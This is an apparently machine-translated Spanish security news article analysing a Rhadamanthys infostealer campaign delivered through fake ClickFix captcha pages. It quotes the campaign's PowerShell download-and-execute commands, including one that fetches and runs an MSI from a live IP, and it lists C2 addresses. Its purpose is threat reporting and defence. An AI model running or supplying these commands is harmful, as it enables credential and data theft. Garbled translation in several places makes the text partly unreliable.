Rhadamanthys surgió por primera vez en 2022 como un robador modular vendido bajo el modelo de malware como servicio, pero su última campaña muestra qué tan rápido es innovador.
En el centro de la nueva ola hay una página de captcha atrapada en bacto llamado ClickFix, que instruye a las víctimas que “verifiquen” su sesión pegando un comando PowerShell.
Una vez ejecutado, el comando se comunica en silencio en hxxps: // ypp-studio (.) Com/update.txt, desactiva las salvaguardas de la política de ejecución y obtiene la carga útil de la siguiente etapa en la memoria, de forma filosa hasta la caída final.
Analistas de Atlas Dark anotado que las páginas de señuelos se alojan en tiposquatos recién registrados, a menudo imitando el estudio de su socio de YouTube o portales SaaS similares, y que la infraestructura subyacente ha emigrado de los anteriores 77.239.96.51/rh_0.9.0.exe al anfitrión de 62.60.226.74/ptrfhdgs.msi.
Este cambio sutil rompe los COI codificados por muchas herramientas de seguridad al tiempo que preserva la cadena de entrega del robador.
La telemetría de la campaña muestra un aumento significativo en las infecciones en empresas pequeñas a medianas durante junio y principios de julio de 2025, con galletas robadas y credenciales en la nube que aparecen en los mercados de madera oscura a las pocas horas del compromiso.
Lo que hace que ClickFix sea especialmente potente es su capa de ingeniería social. La pantalla Captcha ofrece una falsa sensación de legitimidad mientras guía con precisión a la víctima para presionar Win + R, pegar el comando y presionar Enter.
Esa acción única evita los filtros de puerta de enlace de correo electrónico tradicionales y evita las macros que la mayoría de los equipos azules buscan.
Verificación completa (fuente – Atlas oscuro)
Para cuando un usuario ve la tranquilizadora “Verificación completa!” Pop-Up, Rhadamanthys ya desempacó en segundo plano y comenzó a desviar datos a su C2 a 193.109.85.136.
Mecanismo de infección
El comando PowerShell inicial está muy acolchado con símbolos hash para evadir los detectores basados en cadenas, pero se resuelve en solo dos líneas funcionales:–
# Etapa 1-Paypappapla Payload $ u = ‘hxxps: // ypp-studio (.) Com/update.txt’; (New-Object Net.WebClient) .DownloadString ($ u) | IEX # Etapa 2 -decodificado de la etapa 1 Invoke -WebRequest -uri http://62.60.226.74/ptrfhdgs.msi -outfile $ env: appData+’\ ptrfhdgs.msi’; Inicio -process msiexec.exe -argumentList ‘/i’, $ env: appData+’\ ptrfhdgs.msi’;
La etapa 1 vive solo en la memoria; La etapa 2 escribe el instalador MSI como ptrfhdgs.msi, que deja caer rh_0.9.0.exe y lo lanza con MSIEXEC para que las correlaciones de los padres/niños parezcan benignas.
El ejecutable enumera inmediatamente los procesos de ejecución, cazando depugadores como x64dbg.exe, ida64.exe o processhacker.exe; Si se encuentra, se termina para frustrar el análisis.
Se deduce con las verificaciones anti-sandbox basadas en el tiempo utilizando QueryperformanceCounter, luego inyecta en werfault.exe, un error de Windows de confianza que informa binario, para persistir y exfiltrarse.
Una sola secuencia de TCP a la IP codificada lleva archivos comprimidos que contienen bases de datos del navegador, archivos de billetera criptográfica y bóvedas Keepass.
Captura de captura de pantalla (fuente – Atlas oscuro)
Las capturas de pantalla capturadas a través de BITBLT se agregan, lo que brinda a los operadores una ventana en tiempo real a la actividad de las víctimas.
Dado que Rhadamanthys resuelve su C2 por IP literal, las defensas de la capa DNS no se ve nada y encriptados TLS sobre el puerto 443 combinan sin problemas con el tráfico normal.
La campaña de ClickFix subraya cómo los adversarios sin esfuerzo pueden fusionar la ingeniería social con lolbins de baja fricción para evitar las defensas en capas.
Actualización de reglas basadas en la firma para incluir los derivaciones de la política de ejecución, el monitoreo de los procesos infantiles de msiexec.exe y la alerta en PowerShell fuente de portapapeles son pasos inmediatos que los defensores deben considerar.
Sin embargo, la lección más amplia es el comportamiento: cualquier indicador de “verificación” que solicite a los usuarios que ejecute el código es sospechoso, especialmente cuando lo único que arregla es el punto de apoyo del atacante.
Investigue el comportamiento de malware en vivo, rastree cada paso de un ataque y tome decisiones de seguridad más rápidas y inteligentes -> Prueba cualquiera.
